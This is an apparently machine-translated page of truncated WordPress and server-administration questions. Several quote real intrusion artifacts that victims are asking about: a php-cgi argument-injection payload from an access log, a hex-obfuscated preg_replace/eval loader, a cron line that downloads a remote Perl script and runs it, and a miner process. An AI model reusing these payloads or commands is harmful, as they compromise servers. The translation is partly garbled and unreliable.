Articles of wordpress

.htaccess文件被黑了,将来如何防止这个?

黑客在.htaccess文件中添加了一个代码,将所有search引擎stream量redirect到恶意软件网站。 我现在正在调查这个事件,并试图找出安全漏洞。 我的情况几乎和这个人的.htaccess被屡次黑客相似 以下是来自FTP日志的一个插入尝试示例 – Aug 6 02:43:31 sg2nlftpg002 [30887]: ([email protected]) [INFO] FTPUSER is now logged in Aug 6 09:43:33 sg2nlftpg002 [30887]: ([email protected]) [NOTICE] /home/content/81/7838581/html//.htaccess downloaded (846 bytes, 106.37KB/sec) Aug 6 09:43:35 sg2nlftpg002 [30887]: ([email protected]) [NOTICE] /home/content/81/7838581/html//.htaccess uploaded (1435 bytes, 3.32KB/sec) Aug 6 09:43:35 sg2nlftpg002 [30887]: ([email protected]) [INFO] Logout. 这与我的常规login企图有很大的不同 – Aug 7 10:57:53 sg2nlftpg002 […]

在Nginx中拒绝导致PHP-FPM不优先的文件夹

标题说了这一切,但我有一个非常有趣的问题,我很困惑。 基本上,我有一个简单的WordPress安装,我想拒绝一个文件夹(连同文件夹中的所有文件),让我们说/ wp-content / themes / default / scripts,但允许某些IP。 我可以拒绝这个文件夹的位置^~/wp-content/themes/default/scripts {deny all;}就像任何Nginx的大师会告诉你的一样。 但从我的理解,“^”具有更高的优先级,一旦find正则expression式匹配,将停止search其他位置块。 因为我不想拒绝每个人的文件夹(当然,使用allow (IP Address); ;,我的^~/wp-content/…位置块完全wh出我的PHP-FPM位置块来通过文件到FastCGI服务器。当然,当我试图查看文件夹中的任何文件时,PHP文件是直接下载,因为PHP不parsing它。 有没有人有一个想法? 我想阻止该文件夹,但为了让PHP同时为我决定允许的用户工作。 这是一个相当棘手的问题。 我找不到任何问题的答案。 多谢你们! 真的很感谢你的帮助! 对于任何人想知道,我现在的Nginx的vhostconfiguration如下所示: server { #..all of the common stuff you would expect include /folder/nginx.conf; #including some WordPress rewrites for W3 Total Cache # pass the PHP scripts to FastCGI server listening on UNIX […]

Nginx + WordPress:414 Request-URI太长

我用我的服务器上的php-fpm使用Nginx来运行我的WordPress的博客。 当有人在Facebook上分享我的网站时,Facebook添加了一些参数,URL如下所示: https://jp.rlauzier.com/2013/07/les-courriels-et-la-securite-quelques-notions-a-savoir/?fb_action_ids=268110373331078&fb_action_types=og.likes&fb_source=other_multiline&action_object_map=%7B%22268110373331078%22% 3A434166526690497%7D&action_type_map =%7B%22268110373331078%22%3A%22og.likes%22%7D&action_ref_map =%5B%5D 我检查了我的日志,并有这个请求“414请求URI太长”。 我尝试在我的Nginxconfiguration文件中添加large_client_header_buffers,但没有结果。 但是,如果您只使用正常的URL( https://jp.rlauzier.com/2013/07/les-courriels-et-la-securite-quelques-notions-a-savoir/ ),一切工作正常。 这是我的configuration文件: server { listen 443; server_name jp.rlauzier.com; ssl on; ssl_certificate /etc/nginx/ssl/jp.rlauzier.com.crt; ssl_certificate_key /etc/nginx/ssl/jp.rlauzier.com.key; include /var/www/jp.rlauzier.com/public_html/nginx.conf; location / { root /var/www/jp.rlauzier.com/public_html/; index index.php index.html index.htm; if ($request_uri ~* \.(ico|css|js|gif|jpe?g|png)$) { expires max; break; } try_files $uri $uri/ /index.php?q=$uri&$args; } # pass the PHP scripts to […]

使用我的Ubuntu 12.04服务器上的服务器内存exception的sendmail活动

环境 Rackspace公司 Ubuntu 12.04 WordPress的 MySQL的 问题 在过去的几天里,我一直在经历着相当严重的外存问题。 虽然我解决了这个问题的一个可能的原因,我仍然得到一个非常可疑的sendmail活动。 有关如何解决这个问题的任何build议? 我认为这肯定是一些恶意软件,但是我没有经验来解决这种攻击。 HTOP 1 [||||||||||||||||||||||||| 27.0%] Tasks: 101, 50 thr; 1 running 2 [||||||||||||||||||||||||||||||||||||||||| 45.7%] Load average: 12.96 12.55 11.95 Mem[|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||1183/1995MB] Uptime: 09:53:28 Swp[|||| 93/2047MB] PID USER PRI NI VIRT RES SHR S CPU% MEM% TIME+ Command 19704 root 20 0 120M 25328 2896 S 2.0 […]

我怎样才能避免在nginx中使用别名?

由于在nginx的一个长期存在的错误 ,我被build议使用root指令来切换我的别名指令。 不幸的是,这现在打破了我的静态文件,它们位于我的站点path( mysite.com/blog > /var/www/mysite/wordpress )的不同目录中。 我怎样才能解决这个问题,而不改变我的静态文件结构? 这是我的完整位置块: location /blog { root /var/www/mysite/wordpress; try_files $uri $uri/ /blog/index.php$is_args$args; location ~ \.php { fastcgi_pass 127.0.0.1:9000; include fastcgi_params; fastcgi_split_path_info ^(?:\/blog\/)(.+\.php)(.*); fastcgi_param SCRIPT_FILENAME $document_root/$fastcgi_script_name; } }

FastCGI:与服务器通信…中止:空闲超时(30秒)

我有多个运行WordPress的虚拟网站,但是这个开始抛出错误,我无法find问题。 阿帕奇说: [Tue Jul 30 14:13:40 2013] [error] [client 82.100.0.70] FastCGI: comm with server "/var/www/uzivatel/www.domena.xy.php5-fcgi" aborted: idle timeout (30 sec) [Tue Jul 30 14:13:40 2013] [error] [client 82.100.0.70] FastCGI: incomplete headers (0 bytes) received from server "/var/www/uzivatel/www.domena.xy.php5-fcgi" 但是PHP-FPM日志是可以的(它在请求之后的几毫秒内生成): – – 30/Jul/2013:14:13:10 +0200 "GET /index.php" 200 /var/www/uzivatel/webs/www.domena.xy/index.php 793.871 35072 37.79/30.23 有代码200,所以页面似乎被正确创build,但Apache的行为就像从fastcgi服务器没有回应。 但有趣的部分是,当我切断页面生成之前,apache正确地返回到客户端。 但是如果我插入<?php die(); ?> 在标签之后,会发生同样的错误。 […]

ps辅助输出中的`ps`和`bin / bash su`

我有一个共享服务器(由bitnami提供的amazon ec2 micro)和一个Web应用程序(Wordpress),最近显示性能低下(具有相对稳定的stream量和使用率)。 apache2 / logs / access.log中唯一可疑的行是我的forms $ tail –lines=1000 /opt/bitnami/apache2/logs/access_log 93.120.84.31 – – [06/Nov/2013:03:02:54 +0000] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 504 249 并在ps aux输出 daemon 29369 0.0 0.2 17688 1500 ? S 10:52 0:00 /bin/bash ./su 57.54 daemon 29377 30.5 0.0 1780 544 ? R 10:52 3:14 ./ps 57.54 22 这些进程是什么,如果这是一个已知的漏洞,我该如何closures它? 我GOOGLE了这个提到 ,但不能确定这是否适用于我的情况。 如果这个问题属于其他SE网站,请在适当的地方帮我解答。 提前谢谢了! […]

我如何解码这个WordPress黑客?

我在客户端的WordPress驱动的网站上发现了一个有问题的string,我只是想知道它做了什么。 @preg_replace("\x40\50\x2e\53\x29\100\x69\145","\x65\166\x61\154\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\151\x6d\160\x6c\157\x64\145\x28\42\x5c\156\x22\54\x66\151\x6c\145\x28\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x5c\61\x22\51\x29\51\x29\51\x3b","\x4c\62\x68\166\x62\127\x55\166\x64\62\x56\151\x4c\63\x56\172\x5a\130\x4a\172\x4c\172\x49\167\x4d\152\x6b\165\x59\155\x6c\156\x4e\151\x39\172\x61\130\x52\154\x63\171\x39\151\x61\127\x63\62\x4c\63\x42\61\x59\155\x78\160\x59\61\x39\157\x64\107\x31\163\x4c\62\x5a\166\x63\156\x56\164\x4c\62\x4a\151\x4c\127\x6c\165\x59\62\x78\61\x5a\107\x56\172\x4c\62\x70\172\x4c\62\x70\170\x64\127\x56\171\x65\123\x38\165\x59\62\x46\152\x61\107\x55\166\x4c\151\x55\64\x4d\152\x68\106\x4a\124\x41\167\x4d\124\x4d\154\x51\152\x68\107\x4d\171\x56\103\x51\172\x46\103\x4a\125\x49\171\x4d\153\x49\154\x4e\105\x59\61\x4e\167\x3d\75"); 有人可以概述解码这个步骤吗? 我知道preg_replace()是什么,但我不知道如何解码函数的参数,或者PHP如何处理它可以利用的东西。

Apache,nginx或lighttpd?

我将从一个事件现场博客,并期望stream量巨大的高峰。 我目前正在使用modphp的apache,去年在交通繁忙的时候死了,我不希望它再次发生。 我正在考虑为wordpress上运行的这个博客设置一个单独的VPS。 我应该使用什么http服务器? apache,lighttpd或者nginx? 哪个在重负荷下performance最好? AJAX更新的内容将会非常dynamic。

./kernelupdates 100%的CPU使用率

我有一个CENTOS6服务器运行一些wordpress和tomcat网站。 在过去的两天里,它一直在崩溃。 经过调查,我们发现在服务器上消耗100%cpu的二进制文件。 过程在下面提到。 ./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx 但是这个过程似乎无效的内核更新。 可能是服务器被攻破,这个过程是由黑客安装的,所以我杀了这个过程,并删除了Apache用户的cron条目。 但不知怎的,这个过程在几个小时后又重新开始,cron项目也恢复了,我正在寻找修改cron作业的东西。 这个过程是否属于采矿过程? 我们如何停止cronjob修改,并清除这个过程的来源? Cron条目(apache用户) /6 * * * * cd /tmp;wget http://updates.dyndn-web.com/…/abc.txt;curl -O http://updates.dyndn-web.com/…/abc.txt;perl abc.txt;rm -f abc* 的abc.txt #!/usr/bin/perl system("killall -9 minerd"); system("killall -9 PWNEDa"); system("killall -9 PWNEDb"); system("killall -9 PWNEDc"); system("killall -9 PWNEDd"); system("killall -9 PWNEDe"); system("killall -9 PWNEDg"); system("killall […]